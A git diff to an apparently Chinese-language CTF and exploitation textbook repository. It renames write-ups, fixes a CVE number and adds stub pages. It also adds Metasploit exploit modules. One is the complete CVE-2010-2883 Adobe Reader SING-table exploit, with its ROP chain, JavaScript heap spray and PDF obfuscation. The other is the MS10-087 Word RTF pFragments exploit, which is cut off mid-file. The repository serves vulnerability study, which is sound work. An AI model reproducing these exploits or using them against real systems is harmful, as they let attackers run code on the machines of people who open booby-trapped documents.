diff --git a/SUMMARY.md b/SUMMARY.md index 9ef3bdd..c5b1b2e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -59,6 +59,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [2.4.4 binwalk](doc/2.4.4_binwalk.md) * [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md) * [2.4.6 Wireshark](doc/2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md) * [三、分类专题篇](doc/3_topics.md) * Pwn * [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md) @@ -156,10 +157,11 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * Reverse * [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md) * Crypto @@ -175,7 +177,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md) * Malware * [八、学术篇](doc/8_academic.md) * [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md) diff --git a/doc/2.3.2_ollydbg.md b/doc/2.3.2_ollydbg.md index f77eec8..75ea1fa 100644 --- a/doc/2.3.2_ollydbg.md +++ b/doc/2.3.2_ollydbg.md @@ -1,10 +1,21 @@ # 2.3.2 OllyDbg 调试器 - [快捷键](#快捷键) +- [命令行插件](#命令行插件) - [参考资料](#参考资料) ## 快捷键 +- F2:在光标选定位置按 F2 键设置或取消断点。 +- F4:运行到光标选定位置处暂停。 +- F7:单步步入:每次执行一条指令,遇到 call 等子程序时进入其中。 +- F8:单步步过,每次执行一条指令,遇到 call 等子程序时不进入其中。 +- F9:运行,被调试软件继续运行,直到遇到下一个断点。 +- Ctrl+F9:执行到返回,在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。 +- Alt+F9:执行到用户代码,可用于从系统部分快速返回到被调试程序部分。 + + +## 命令行插件 ## 参考资料 - http://www.ollydbg.de/ diff --git a/doc/2.4.7_cuckoo.md b/doc/2.4.7_cuckoo.md new file mode 100644 index 0000000..c663bc6 --- /dev/null +++ b/doc/2.4.7_cuckoo.md @@ -0,0 +1,13 @@ +# 2.4.7 Cuckoo Sandbox + +- [简介](#简介) +- [安装](#安装) +- [参考资料](#参考资料) + + +## 简介 + +## 安装 + +## 参考资料 +- https://cuckoosandbox.org/ diff --git a/doc/2_tools.md b/doc/2_tools.md index 968a039..490269d 100644 --- a/doc/2_tools.md +++ b/doc/2_tools.md @@ -24,3 +24,4 @@ * [2.4.4 binwalk](2.4.4_binwalk.md) * [2.4.5 Burp Suite](2.4.5_burpsuite.md) * [2.4.6 Wireshark](2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md) diff --git a/doc/5.8.1_z3.md b/doc/5.8.1_z3.md index 14f8dd3..cb88fbe 100644 --- a/doc/5.8.1_z3.md +++ b/doc/5.8.1_z3.md @@ -23,7 +23,6 @@ ``` $ git clone https://github.com/Z3Prover/z3.git $ cd z3 - $ python scripts/mk_make.py --python $ cd build $ make diff --git a/doc/5.8_sat-smt.md b/doc/5.8_sat-smt.md index d3177f4..99da957 100644 --- a/doc/5.8_sat-smt.md +++ b/doc/5.8_sat-smt.md @@ -2,5 +2,7 @@ - [参考资料](#参考资料) + ## 参考资料 - [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf) +- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution) diff --git a/doc/6.2.3_re_codegate2017_angrybird.md b/doc/6.2.3_re_codegatectf2017_angrybird.md similarity index 99% rename from doc/6.2.3_re_codegate2017_angrybird.md rename to doc/6.2.3_re_codegatectf2017_angrybird.md index 2fd291e..746f47d 100644 --- a/doc/6.2.3_re_codegate2017_angrybird.md +++ b/doc/6.2.3_re_codegatectf2017_angrybird.md @@ -1,10 +1,10 @@ -# 6.2.3 re Codegate2017 angrybird +# 6.2.3 re CodegateCTF2017 angrybird - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird) +[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird) ## 题目解析 看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。 @@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:) ## 参考资料 +- https://ctftime.org/task/3375 diff --git a/doc/6.2.6_re_seccon2017_printf_machine.md b/doc/6.2.6_re_secconctf2017_printf_machine.md similarity index 76% rename from doc/6.2.6_re_seccon2017_printf_machine.md rename to doc/6.2.6_re_secconctf2017_printf_machine.md index 2a9c2b2..2d159bd 100644 --- a/doc/6.2.6_re_seccon2017_printf_machine.md +++ b/doc/6.2.6_re_secconctf2017_printf_machine.md @@ -1,10 +1,10 @@ -# 6.2.6 re SECCON2017 printf_machine +# 6.2.6 re SECCONCTF2017 printf_machine - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine) +[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine) ## 题目解析 ``` @@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l ## 参考资料 +- https://ctftime.org/task/5042 - [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine) diff --git a/doc/6.2.7_re_codegatectf2018_redvelvet.md b/doc/6.2.7_re_codegatectf2018_redvelvet.md new file mode 100644 index 0000000..0857a0e --- /dev/null +++ b/doc/6.2.7_re_codegatectf2018_redvelvet.md @@ -0,0 +1,17 @@ +# 6.2.7 re CodegateCTF2018 RedVelvet + +- [题目解析](#题目解析) +- [参考资料](#参考资料) + + +[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet) + +## 题目解析 +``` +$ file RedVelvet +RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped +``` + + +## 参考资料 +- https://ctftime.org/task/5231 diff --git a/doc/6.3.1_web_hctf2017_babycrack.md b/doc/6.3.1_web_hctf2017_babycrack.md index 42fe31b..ae8a1ff 100644 --- a/doc/6.3.1_web_hctf2017_babycrack.md +++ b/doc/6.3.1_web_hctf2017_babycrack.md @@ -4,6 +4,8 @@ - [解题流程](#解题流程) +[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack) + ## 题目解析 题目就不用多说了,很容易发现是 JavaScript 代码审计。 diff --git a/doc/6_writeup.md b/doc/6_writeup.md index 292708c..6a5e5df 100644 --- a/doc/6_writeup.md +++ b/doc/6_writeup.md @@ -32,10 +32,11 @@ * Reverse * [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md) * Crypto diff --git a/doc/7.1.8_adobe_reader_2010-2883.md b/doc/7.1.8_adobe_reader_2010-2883.md index 8ba5186..1684422 100644 --- a/doc/7.1.8_adobe_reader_2010-2883.md +++ b/doc/7.1.8_adobe_reader_2010-2883.md @@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的 | --- | --- | --- | | 操作系统 | Windows XP SP3 | 体系结构:32 位 | | 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:6.8 | | 漏洞软件 | Adobe Reader | 版本号:9.3.4 | 我们利用 Metasploit 来生成攻击样本: diff --git a/doc/7.1.9_ms_word_2010-2333.md b/doc/7.1.9_ms_word_2010-2333.md deleted file mode 100644 index 36df6c8..0000000 --- a/doc/7.1.9_ms_word_2010-2333.md +++ /dev/null @@ -1,18 +0,0 @@ -# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞 - -- [漏洞描述](#漏洞描述) -- [漏洞复现](#漏洞复现) -- [漏洞分析](#漏洞分析) -- [参考资料](#参考资料) - - -[下载文件](../src/exploit/7.1.9_ms_word_2010-2333) - -## 漏洞描述 - -## 漏洞复现 - -## 漏洞分析 - -## 参考资料 -- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7.1.9_ms_word_2010-3333.md b/doc/7.1.9_ms_word_2010-3333.md new file mode 100644 index 0000000..f1a3956 --- /dev/null +++ b/doc/7.1.9_ms_word_2010-3333.md @@ -0,0 +1,29 @@ +# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞 + +- [漏洞描述](#漏洞描述) +- [漏洞复现](#漏洞复现) +- [漏洞分析](#漏洞分析) +- [参考资料](#参考资料) + + +[下载文件](../src/exploit/7.1.9_ms_word_2010-3333) + +## 漏洞描述 +cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。 + + +## 漏洞复现 +| |推荐使用的环境 | 备注 | +| --- | --- | --- | +| 操作系统 | Windows XP SP3 | 体系结构:32 位 | +| 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:7.0 | +| 漏洞软件 | MS Office | 版本号:2003 SP3 | + +我们利用 Metasploit 来生成攻击样本 + + +## 漏洞分析 + +## 参考资料 +- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7_exploit.md b/doc/7_exploit.md index 1bc60cf..51133af 100644 --- a/doc/7_exploit.md +++ b/doc/7_exploit.md @@ -9,5 +9,5 @@ * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md) * Malware diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb new file mode 100644 index 0000000..422e35c --- /dev/null +++ b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb @@ -0,0 +1,562 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table + handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are + assumed to be vulnerable as well. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # 0day found in the wild + 'sn0wfl0w', # initial analysis, also @vicheck on twitter + 'jduck' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2010-2883' ], + [ 'OSVDB', '67849'], + [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ], + [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd + # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd + # Tested OK via Adobe Reader 9.3 on XP and 7 -todb + [ 'Automatic', { }], + ], + 'DisclosureDate' => 'Sep 07 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ]) + end + + def exploit + ttf_data = make_ttf() + + js_data = make_js(payload.encoded) + + # Create the pdf + pdf = make_pdf(ttf_data, js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + file_create(pdf) + end + + def make_ttf + ttf_data = "" + + # load the static ttf file + + # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20) + path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" ) + fd = File.open( path, "rb" ) + ttf_data = fd.read(fd.stat.size) + fd.close + + # Build the SING table + sing = '' + sing << [ + 0, 1, # tableVersionMajor, tableVersionMinor (0.1) + 0xe01, # glyphletVersion + 0x100, # embeddingInfo + 0, # mainGID + 0, # unitsPerEm + 0, # vertAdvance + 0x3a00 # vertOrigin + ].pack('vvvvvvvv') + # uniqueName + # "The uniqueName string must be a string of at most 27 7-bit ASCII characters" + #sing << "A" * (0x254 - sing.length) + sing << rand_text(0x254 - sing.length) + + # 0xffffffff gets written here @ 0x7001400 (in BIB.dll) + sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V') + + # This becomes our new EIP (puts esp to stack buffer) + ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret + sing[0x208, 4] = [ret].pack('V') + + # This becomes the new eip after the first return + ret = 0x4a82a714 + sing[0x18, 4] = [ret].pack('V') + + # This becomes the new esp after the first return + esp = 0x0c0c0c0c + sing[0x1c, 4] = [esp].pack('V') + + # Without the following, sub_801ba57 returns 0. + sing[0x24c, 4] = [0x6c].pack('V') + + ttf_data[0xec, 4] = "SING" + ttf_data[0x11c, sing.length] = sing + + ttf_data + end + + def make_js(encoded_payload) + + # The following executes a ret2lib using icucnv36.dll + # The effect is to bypass DEP and execute the shellcode in an indirect way + stack_data = [ + 0x41414141, # unused + 0x4a8063a5, # pop ecx / ret + 0x4a8a0000, # becomes ecx + + 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as + + 0x4a801f90, # pop eax / ret + 0x4a84903c, # becomes eax (import for CreateFileA) + + # -- call CreateFileA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591") + 0x10000000, # second arg - dwDesiredAccess + 0x00000000, # third arg - dwShareMode + 0x00000000, # fourth arg - lpSecurityAttributes + 0x00000002, # fifth arg - dwCreationDisposition + 0x00000102, # sixth arg - dwFlagsAndAttributes + 0x00000000, # seventh arg - hTemplateFile + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + # + # This points at a neat-o block of code that ... TBD + # + # and [esp+ebx*2],edi + # jne check_slash + # ret_one: + # mov al,1 + # ret + # check_slash: + # cmp al,0x2f + # je ret_one + # cmp al,0x41 + # jl check_lower + # cmp al,0x5a + # jle check_ptr + # check_lower: + # cmp al,0x61 + # jl ret_zero + # cmp al,0x7a + # jg ret_zero + # cmp [ecx+1],0x3a + # je ret_one + # ret_zero: + # xor al,al + # ret + # + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849038, # becomes eax (import for CreateFileMappingA) + + # -- call CreateFileMappingA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # arguments to CreateFileMappingA, hFile + 0x00000000, # lpAttributes + 0x00000040, # flProtect + 0x00000000, # dwMaximumSizeHigh + 0x00010000, # dwMaximumSizeLow + 0x00000000, # lpName + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849030, # becomes eax (import for MapViewOfFile + + # -- call MapViewOfFile + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # args to MapViewOfFile - hFileMappingObject + 0x00000022, # dwDesiredAccess + 0x00000000, # dwFileOffsetHigh + 0x00000000, # dwFileOffsetLow + 0x00010000, # dwNumberOfBytesToMap + + 0x4a8063a5, # pop ecx / ret + 0x4a8a0004, # becomes ecx - writable pointer + + 0x4a802196, # mov [ecx],eax / ret - save map base addr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000030, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a8a0004, # becomes eax - saved file mapping ptr + + 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000020, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret + + 0x4a801f90, # pop eax / ret + 0x00000034, # becomes eax + + 0x4a80d585, # add eax,edx / ret + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x0000000a, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849170, # becomes eax (import for memcpy) + + # -- call memcpy + 0x4a80b692, # jmp [eax] + + 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy + 0xffffffff, # becomes first arg to memcpy (dst) + 0xffffffff, # becomes second arg to memcpy (src) + 0x00001000, # becomes third arg to memcpy (length) + #0x0000258b, # ?? + #0x4d4d4a8a, # ?? + ].pack('V*') + + var_unescape = rand_text_alpha(rand(100) + 1) + var_shellcode = rand_text_alpha(rand(100) + 1) + + var_start = rand_text_alpha(rand(100) + 1) + + var_s = 0x10000 + var_c = rand_text_alpha(rand(100) + 1) + var_b = rand_text_alpha(rand(100) + 1) + var_d = rand_text_alpha(rand(100) + 1) + var_3 = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(100) + 1) + var_4 = rand_text_alpha(rand(100) + 1) + + payload_buf = '' + payload_buf << stack_data + payload_buf << encoded_payload + + escaped_payload = Rex::Text.to_unescape(payload_buf) + + js = %Q| +var #{var_unescape} = unescape; +var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); +var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); +while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; +#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); +#{var_b} += #{var_shellcode}; +#{var_b} += #{var_c}; +#{var_d} = #{var_b}.substring(0, #{var_s}/2); +while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; +#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); +var #{var_4} = new Array(); +for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; +| + + js + end + + def random_non_ascii_string(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def io_def(id) + "%d 0 obj \n" % id + end + + def io_ref(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def n_obfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ascii_hex_whitespace_encode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(ttf, js) + + #swf_name = rand_text_alpha(8 + rand(8)) + ".swf" + + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << random_non_ascii_string(4) << eol + + # catalog + xref << pdf.length + pdf << io_def(1) << n_obfu("<<") << eol + pdf << n_obfu("/Pages ") << io_ref(2) << eol + pdf << n_obfu("/Type /Catalog") << eol + pdf << n_obfu("/OpenAction ") << io_ref(11) << eol + # The AcroForm is required to get icucnv36.dll to load + pdf << n_obfu("/AcroForm ") << io_ref(13) << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << io_def(2) << n_obfu("<<") << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol + pdf << n_obfu("/Count 1") << eol + pdf << n_obfu("/Type /Pages") << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # media box + xref << pdf.length + pdf << io_def(3) + pdf << "[0 0 595 842]" << eol + pdf << endobj + + # resources + xref << pdf.length + pdf << io_def(4) + pdf << n_obfu("<<") << eol + pdf << n_obfu("/Font ") << io_ref(6) << eol + pdf << ">>" << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << io_def(5) << n_obfu("<<") << eol + pdf << n_obfu("/Parent ") << io_ref(2) << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol + pdf << n_obfu("/Type /Page") << eol + pdf << n_obfu(">>") << eol # end obj dict + pdf << endobj + + # font + xref << pdf.length + pdf << io_def(6) << n_obfu("<<") << eol + pdf << n_obfu("/F1 ") << io_ref(7) << eol + pdf << ">>" << eol + pdf << endobj + + # ttf object + xref << pdf.length + pdf << io_def(7) << n_obfu("<<") << eol + pdf << n_obfu("/Type /Font") << eol + pdf << n_obfu("/Subtype /TrueType") << eol + pdf << n_obfu("/Name /F1") << eol + pdf << n_obfu("/BaseFont /Cinema") << eol + pdf << n_obfu("/Widths []") << eol + pdf << n_obfu("/FontDescriptor ") << io_ref(9) + pdf << n_obfu("/Encoding /MacRomanEncoding") + pdf << n_obfu(">>") << eol + pdf << endobj + + # page content + content = "Hello World!" + content = "" + + "0 g" + eol + + "BT" + eol + + "/F1 32 Tf" + eol + + "32 Tc" + eol + + "1 0 0 1 32 773.872 Tm" + eol + + "(" + content + ") Tj" + eol + + "ET" + + xref << pdf.length + pdf << io_def(8) << "<<" << eol + pdf << n_obfu("/Length %s" % content.length) << eol + pdf << ">>" << eol + pdf << "stream" << eol + pdf << content << eol + pdf << "endstream" << eol + pdf << endobj + + # font descriptor + xref << pdf.length + pdf << io_def(9) << n_obfu("<<") + pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema") + pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17)) + pdf << n_obfu("/FontBBox [-177 -269 1123 866]") + pdf << n_obfu("/FontFile2 ") << io_ref(10) + pdf << n_obfu(">>") << eol + pdf << endobj + + # ttf stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ttf) + pdf << io_def(10) << n_obfu("<>" % [compressed.length, ttf.length]) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + # js action + xref << pdf.length + pdf << io_def(11) << n_obfu("<<") + pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12) + pdf << n_obfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js)) + pdf << io_def(12) << n_obfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll to load + ### + + # form object + xref << pdf.length + pdf << io_def(13) + pdf << n_obfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << io_def(14) << n_obfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << n_obfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end +end diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf b/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf new file mode 100755 index 0000000..58cd6b5 Binary files /dev/null and b/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf differ diff --git a/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb b/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb new file mode 100644 index 0000000..fe89051 --- /dev/null +++ b/src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb @@ -0,0 +1,199 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in the handling of the + 'pFragments' shape property within the Microsoft Word RTF parser. All versions + of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the + MS10-087 bulletin are vulnerable. + + This module does not attempt to exploit the vulnerability via Microsoft Outlook. + + The Microsoft Word RTF parser was only used by default in versions of Microsoft + Word itself prior to Office 2007. With the release of Office 2007, Microsoft + began using the Word RTF parser, by default, to handle rich-text messages within + Outlook as well. It was possible to configure Outlook 2003 and earlier to use + the Microsoft Word engine too, but it was not a default setting. + + It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that + Microsoft will confirm or deny this since Office 2000 has reached its support + cycle end-of-life. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'wushi of team509', # original discovery + 'unknown', # exploit found in the wild + 'jduck', # Metasploit module + 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz + ], + 'References' => + [ + [ 'CVE', '2010-3333' ], + [ 'OSVDB', '69085' ], + [ 'MSB', 'MS10-087' ], + [ 'BID', '44652' ], + [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + 